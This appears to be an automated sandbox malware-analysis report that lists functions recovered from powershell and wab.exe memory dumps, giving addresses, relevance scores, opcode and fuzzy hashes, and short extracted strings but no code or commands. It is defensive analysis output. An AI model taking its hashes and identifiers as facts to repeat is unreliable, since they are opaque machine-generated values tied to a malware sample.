                                                        • Instruction ID: 182281608c033e5d97abfb44a76831da4d88e713ac940cb4a22c710a3bcc3c42
                                                        • Opcode Fuzzy Hash: af54db03eae5e9f3b7a48d43b84f565c99292e2975a72387b2fb5ca55e14086a
                                                        • Instruction Fuzzy Hash: 77D16AB2B04216CFCB359F6898107AABBA2AFE5310F14847AD505CB791DF32DD45C792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D6368 Relevance: 5.2, Strings: 4, Instructions: 154COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tPkq$tPkq$$kq$$kq
                                                        • API String ID: 0-325073643
                                                        • Opcode ID: bbf54509b787a423c5a746a90784f93bb9da2b4bd461a5e890f4ef066943564b
                                                        • Instruction ID: 3aec3b9cf342f2cd57bfef0bcd9877c814e56050e5e3b13b1686af870735dd88
                                                        • Opcode Fuzzy Hash: bbf54509b787a423c5a746a90784f93bb9da2b4bd461a5e890f4ef066943564b
                                                        • Instruction Fuzzy Hash: 9451ABB17453898FC3225B28881459ABFB2AF92354F19849BD444DF3A3D730DC44C3E2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D5738 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $kq$$kq$$kq$$kq
                                                        • API String ID: 0-2881790790
                                                        • Opcode ID: 2141e91328a206cb8099dc09e1cdb24a112a9047ed8832a263facb7e84328d0e
                                                        • Instruction ID: 099f0d66206e4f7115496190ba52de12bf78278170917e12919f092347eac268
                                                        • Opcode Fuzzy Hash: 2141e91328a206cb8099dc09e1cdb24a112a9047ed8832a263facb7e84328d0e
                                                        • Instruction Fuzzy Hash: 1831A6723103069BE63469298C10B3FA78A9BC1708F24483BE905CF3D5DE7AED5583A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D0CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $kq$$kq$$kq$$kq
                                                        • API String ID: 0-2881790790
                                                        • Opcode ID: f06a898cb02cbcedd2d7e329ae56c4a9cf7d8c65402a3ed0722e1933a91398b0
                                                        • Instruction ID: 26166c59cd5bde810dfd38998d07a7d4c6311cf6003edb2f4e2fa3815f6c5797
                                                        • Opcode Fuzzy Hash: f06a898cb02cbcedd2d7e329ae56c4a9cf7d8c65402a3ed0722e1933a91398b0
                                                        • Instruction Fuzzy Hash: 00216BB135030A5BDB385D3A9C18727B7D69BE1314F24893BE509CB385DD7AEC408361
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 078D1749 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$$kq$$kq
                                                        • API String ID: 0-1727931526
                                                        • Opcode ID: 2841ad22497e8d90d30452f44ed3a01da6141404c5171d2d1ea663beeade8541
                                                        • Instruction ID: 39bbfb04f0e38924b718d15d8b05b925a24dc83224cab5efa453a85fa45bf0ac
                                                        • Opcode Fuzzy Hash: 2841ad22497e8d90d30452f44ed3a01da6141404c5171d2d1ea663beeade8541
                                                        • Instruction Fuzzy Hash: 9801F234B0D3894FCB3B262858201657FF35FD359432A05EBC481DF7AACA299D4983A3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        Function 2224A970 Relevance: 3.1, Instructions: 3071COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9e9cbf5732fa8ee51add44a73a9c1c2bab74de6e067245c900d7a306d483ccb7
                                                        • Instruction ID: 34fba4ca3b670c71ae16a3f2b79edbecd209f255ba9daf895e19bc6ade94c300
                                                        • Opcode Fuzzy Hash: 9e9cbf5732fa8ee51add44a73a9c1c2bab74de6e067245c900d7a306d483ccb7
                                                        • Instruction Fuzzy Hash: D9631A31D10B1A8ACB15EF68C980699F7B1FF99300F51D79AE44877225EF70AAC5CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22243E80 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V*k
                                                        • API String ID: 0-2107984380
                                                        • Opcode ID: 4b6c7a278081e46d59683da00c4a83eebe035f76a79a280b8bc0713da146284d
                                                        • Instruction ID: a09150801d92c064b77cd34ef6ba411bf48de7775b13ce61caeb6a404401d531
                                                        • Opcode Fuzzy Hash: 4b6c7a278081e46d59683da00c4a83eebe035f76a79a280b8bc0713da146284d
                                                        • Instruction Fuzzy Hash: 23914E70E0030A8FDB08CFA9DE817DEBBF2AF58314F148129E519AB258DF759945CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22244A98 Relevance: .3, Instructions: 266COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 45aad5546873c78b6505297df8004827b45af5c9bdf6d3702c8ee4ae10cb5385
                                                        • Instruction ID: a7fae5f261b0319aeff3dedeafc6efed3bc66d7d0f813c507645540da13ad1d4
                                                        • Opcode Fuzzy Hash: 45aad5546873c78b6505297df8004827b45af5c9bdf6d3702c8ee4ae10cb5385
                                                        • Instruction Fuzzy Hash: 09B16F70E0030ACFDB08CFA8CD8179DBBF2AF88754F148129E815EB258EB759945CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22244804 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V*k$\V*k
                                                        • API String ID: 0-2155404002
                                                        • Opcode ID: 3e98c9f7066934f36f050b19f1a0999603d02f516532f396172c72caa30d09bd
                                                        • Instruction ID: 8c94cc17aec3c7932257f15df6d4f86b4f106a9dbf3df855b20949f7dbaff105
                                                        • Opcode Fuzzy Hash: 3e98c9f7066934f36f050b19f1a0999603d02f516532f396172c72caa30d09bd
                                                        • Instruction Fuzzy Hash: B57179B0E0035ACFDB18CFA9C9807DEBBF1BF48714F108129E414AB258EB799841CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22244810 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V*k$\V*k
                                                        • API String ID: 0-2155404002
                                                        • Opcode ID: b142cf378f138812b6e4e1b5140f14e0002c3b7af8089ad69336033d0398d91c
                                                        • Instruction ID: 462a13fd4b823d52d19aa88402bd6be7932eceb2c6c4a6a5d2b03e3a2cc3d48e
                                                        • Opcode Fuzzy Hash: b142cf378f138812b6e4e1b5140f14e0002c3b7af8089ad69336033d0398d91c
                                                        • Instruction Fuzzy Hash: 41716CB0E00359CFDB18CFA9CD9079EBBF2BF88714F148129E514AB258EB759841DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22243E74 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V*k
                                                        • API String ID: 0-2107984380
                                                        • Opcode ID: d811a010df60e3291882255fd7d3a43c47be790fa1c805c9f4c84745dec59b55
                                                        • Instruction ID: f00535bcc6265b3574a59b838172769f2cd20555d552a294b4548ea2fad96c05
                                                        • Opcode Fuzzy Hash: d811a010df60e3291882255fd7d3a43c47be790fa1c805c9f4c84745dec59b55
                                                        • Instruction Fuzzy Hash: 46915F70E0030ADFDB08CFA8DE817DEBBF1AF58314F208129E519AB258DB759945CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22246EE0 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRkq
                                                        • API String ID: 0-1052062081
                                                        • Opcode ID: 9f803c21cae41a0617db77c1f7eb3bed22f146a33e49e6b56f4610a20697a251
                                                        • Instruction ID: 6f0184e24306fc7b6bfe4867fcb8db325c21303d257ba6d0c87f9b88dbd26403
                                                        • Opcode Fuzzy Hash: 9f803c21cae41a0617db77c1f7eb3bed22f146a33e49e6b56f4610a20697a251
                                                        • Instruction Fuzzy Hash: AA515E30B112158FCB08DB68C954AAE77F6EF88714F204469E406EB3A5DF76EC41CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22240848 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Co
                                                        • API String ID: 0-3798529171
                                                        • Opcode ID: 2881dab3189795b01169024173c77cfe06b2e9cb3217a13847c1d8cb2c268f5c
                                                        • Instruction ID: 4de61cc65842c216c037043718ee3c01144b1301a434ee21b0521e75491955f0
                                                        • Opcode Fuzzy Hash: 2881dab3189795b01169024173c77cfe06b2e9cb3217a13847c1d8cb2c268f5c
                                                        • Instruction Fuzzy Hash: 0C118F30F043065BEB5D9A79CF40B1A7691EB85614F604A79E006EB35ADE66CEC1CBC1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22248739 Relevance: .6, Instructions: 555COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f31921dc0019eb650b229c2fea3db2f1329a6d2e51d0d59532283c1d164419d
                                                        • Instruction ID: e78759098781b8cdc71fd62f8675df23351f017a7f09ce82cbc9649fc2cd67ba
                                                        • Opcode Fuzzy Hash: 1f31921dc0019eb650b229c2fea3db2f1329a6d2e51d0d59532283c1d164419d
                                                        • Instruction Fuzzy Hash: 8E129070B142068FD70DAB38CA9121876A3FBD5308B548979E401EB399EF39ED47DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22248748 Relevance: .6, Instructions: 550COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 781aa0a3e2e358c43b18208f7e457d99741cc9a4f8af2c5d1b468cf7f5ee205a
                                                        • Instruction ID: fcb41dc476ea872c939e218bc0b780ddff6c6a320f1f1ff908ba11afc171f3d2
                                                        • Opcode Fuzzy Hash: 781aa0a3e2e358c43b18208f7e457d99741cc9a4f8af2c5d1b468cf7f5ee205a
                                                        • Instruction Fuzzy Hash: 3012A070B142068FD70DAB38C99121876A3FBD5308B544979E401EB399EF39ED47DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22244A8E Relevance: .3, Instructions: 263COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c3bf2199056691f9df12a71bdfab364b1eb8b674854d58e4d45d86b5c2c940fb
                                                        • Instruction ID: 64edd01d2eda2987f5084b6bbb2f2391c6396eebdcdfc230ff7216b88e83aea8
                                                        • Opcode Fuzzy Hash: c3bf2199056691f9df12a71bdfab364b1eb8b674854d58e4d45d86b5c2c940fb
                                                        • Instruction Fuzzy Hash: E7B13B70E0031ACFDB08CFA8DD817DDBBF1AF48754F148529E818AB258EB759985CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 2224A202 Relevance: .3, Instructions: 251COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: db038b8c9be5ca07829f0409a2218f147f524f8a4287d21c6d784813f65d5dba
                                                        • Instruction ID: bcd15f8861546c2ee7784c446f42083c440fa1ce56904b5f7c49d49d98cf8e99
                                                        • Opcode Fuzzy Hash: db038b8c9be5ca07829f0409a2218f147f524f8a4287d21c6d784813f65d5dba
                                                        • Instruction Fuzzy Hash: 33A14C34B002059FCB08DFA4D9A4A9DBBB2EF88714F248464E805EB369DE79DD42DB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 2224A6D0 Relevance: .2, Instructions: 216COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e601f692f620b0813afab74a9b68cfbe1d548ac229292ee7f0f5055b2896c88b
                                                        • Instruction ID: 1bea168217f07980b786d6c84ecbe29b39c95665ebf5b30d64cbbb59db69b11c
                                                        • Opcode Fuzzy Hash: e601f692f620b0813afab74a9b68cfbe1d548ac229292ee7f0f5055b2896c88b
                                                        • Instruction Fuzzy Hash: 55719D71E002059FDB08DF68D994B9EBBF2FF88310F10C169E908AB399DB759845CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 2224A510 Relevance: .1, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 55c0ede27143742d524f0e6cbcc5b7d0a3f8707183dd0fc53254835437f096d0
                                                        • Instruction ID: 413b2a67b0df01b3282d431ca02bd6d22594a9d1062532e24963c7c9e8576cbe
                                                        • Opcode Fuzzy Hash: 55c0ede27143742d524f0e6cbcc5b7d0a3f8707183dd0fc53254835437f096d0
                                                        • Instruction Fuzzy Hash: 2A41C370F003068FDF189B68CEA075EB765EB85310F20486AD50ADB399DA3ADD85DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22246CDC Relevance: .1, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5e1c6ea4c487cae30aa9b94d205e4ab6aa22760b12467bb3285f5543f2b3dcd6
                                                        • Instruction ID: 151732f09da3f7ab53c49f1d1d62506be9e9e4ab38ec9bf481e1e6ddc6b68e00
                                                        • Opcode Fuzzy Hash: 5e1c6ea4c487cae30aa9b94d205e4ab6aa22760b12467bb3285f5543f2b3dcd6
                                                        • Instruction Fuzzy Hash: E651E3B0E10319CFDB08CFA9C984BADBBF1BF48714F148119E815AB259DB75A844CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22246CE0 Relevance: .1, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a7b0b55cf857a99bc318a0b66528e25ea401b962668d41dd91350ea818a363ff
                                                        • Instruction ID: c9930ea5fe2c71cc7157862edf475de77fd870552b04ee4154898597bfaa2ac7
                                                        • Opcode Fuzzy Hash: a7b0b55cf857a99bc318a0b66528e25ea401b962668d41dd91350ea818a363ff
                                                        • Instruction Fuzzy Hash: 3A51D3B0E10319CFDB08CFA9C984BADBBF1BF48714F148119E815AB259DB75A844CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22241138 Relevance: .1, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5ea770850ce021d7192c088376c3789da6eadd62f72aeacd93ec82cea14c0f0d
                                                        • Instruction ID: 3a5378807400f068c32b5a04eb6bd7d92a324c513927392da1094b61963edce8
                                                        • Opcode Fuzzy Hash: 5ea770850ce021d7192c088376c3789da6eadd62f72aeacd93ec82cea14c0f0d
                                                        • Instruction Fuzzy Hash: 0D51EA307692468FC60EFB7CDB809647FE1F7A672C30495A5D4046B3B5DE38A94ACB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 2224DE7A Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22f7ffb56746cce54b61f8888220f70e2a92e9aa924ec661ea0600688fa86083
                                                        • Instruction ID: ae962dbf9bfdd119ca4f91c53d8b2c3ec7c7f04d69d4cf74808dbe16dd27a539
                                                        • Opcode Fuzzy Hash: 22f7ffb56746cce54b61f8888220f70e2a92e9aa924ec661ea0600688fa86083
                                                        • Instruction Fuzzy Hash: 20313C75B00616EFD705DB68C990E3AB7AAFFC4300F55C158E5059B2A9CF36E886CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 222426DC Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 280e3e498a8cf769137facd7f2b8d674f8efa3a8d69e117d36c54525ffce8492
                                                        • Instruction ID: 235b5102090b2bdce9f92ddee3f963a0c344a077db279453fad92f7800105d45
                                                        • Opcode Fuzzy Hash: 280e3e498a8cf769137facd7f2b8d674f8efa3a8d69e117d36c54525ffce8492
                                                        • Instruction Fuzzy Hash: CE41FEB0D00349DFDB14CFA9C980ADEBFB5BF48314F208129E409AB264DB75A946CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 222426E8 Relevance: .1, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: afbad07ebec6281ce7ffa25218266b2f4a16ce162c9133fe90b3af703fbacfa4
                                                        • Instruction ID: 8e311cc18c68b1b246306ede146aa0e2bbb9510adb6442d70736740cbe728108
                                                        • Opcode Fuzzy Hash: afbad07ebec6281ce7ffa25218266b2f4a16ce162c9133fe90b3af703fbacfa4
                                                        • Instruction Fuzzy Hash: 7A41EEB0D00349DFDB14CFAAC980ADEBFB5FF48310F108529E809AB264DB75A945CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0299D006 Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2925662289.000000000299D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0299D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_299d000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4262ff74acc511bedf0e9f9a8e453e86c52efac218666ac21d8d3e5ab65557fb
                                                        • Instruction ID: 421c580fbcdd30116be34ba7a3024b05289e260894f6c19f05afff99109b0079
                                                        • Opcode Fuzzy Hash: 4262ff74acc511bedf0e9f9a8e453e86c52efac218666ac21d8d3e5ab65557fb
                                                        • Instruction Fuzzy Hash: 3F312B7110D3C49FCB078B24C994711BF75AF47214F19C5DBD8888F2A7C23A985ACB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0298D4D8 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2925619133.000000000298D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0298D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_298d000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8935a577d22e2784dc1f936e26e503908113307f28b66fd2a4cba9b1c487011f
                                                        • Instruction ID: f78c7a838de4d76d9b9ae078a1d75ecd8a75ca5a6be7977683024c305ab5ef64
                                                        • Opcode Fuzzy Hash: 8935a577d22e2784dc1f936e26e503908113307f28b66fd2a4cba9b1c487011f
                                                        • Instruction Fuzzy Hash: D121F871504204DFDB05EF24D9C4B17BFA5FB98318F28856AD9094B29AC336D856C6B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 2224187A Relevance: .1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06d91e7e12084429abbbe0cbfe062b54dd8a41fbc77133897b0c315958283368
                                                        • Instruction ID: 8b96b37d49a09f8dd5631373b545d2c6aefa27e5b2a11108f457222eb21b1cc4
                                                        • Opcode Fuzzy Hash: 06d91e7e12084429abbbe0cbfe062b54dd8a41fbc77133897b0c315958283368
                                                        • Instruction Fuzzy Hash: 6F212C30B103268BDB18DB74CA5579E77F2AB49248F100568C505FB2A9DF3A9D41CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0299D044 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2925662289.000000000299D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0299D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_299d000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a18e9b13695d622f1399014722cfa1b25aeaf284efd9cc631859835592c707a7
                                                        • Instruction ID: d4d62f6f5af79fb1c60b4d8b87e80e98ab6e7642610667987a3a1510bb7a533b
                                                        • Opcode Fuzzy Hash: a18e9b13695d622f1399014722cfa1b25aeaf284efd9cc631859835592c707a7
                                                        • Instruction Fuzzy Hash: CF210471604204DFDF14EF28C9C4B26BBA5FB88324F20C96DE8494B251C77AD886CA72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22241888 Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8741d36ab82ebbd4e8cb3d4419f54c62be8fa13d01145315ed9efc18bfb71aec
                                                        • Instruction ID: 2dde96156011d618398584d4f97297adc2b5621f3d9515ee55a382f7447274ba
                                                        • Opcode Fuzzy Hash: 8741d36ab82ebbd4e8cb3d4419f54c62be8fa13d01145315ed9efc18bfb71aec
                                                        • Instruction Fuzzy Hash: 34212A30B003298FDB18EB74CA557AE77F6AB49385F200468C505FB2A8DF369D40CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 222416B0 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
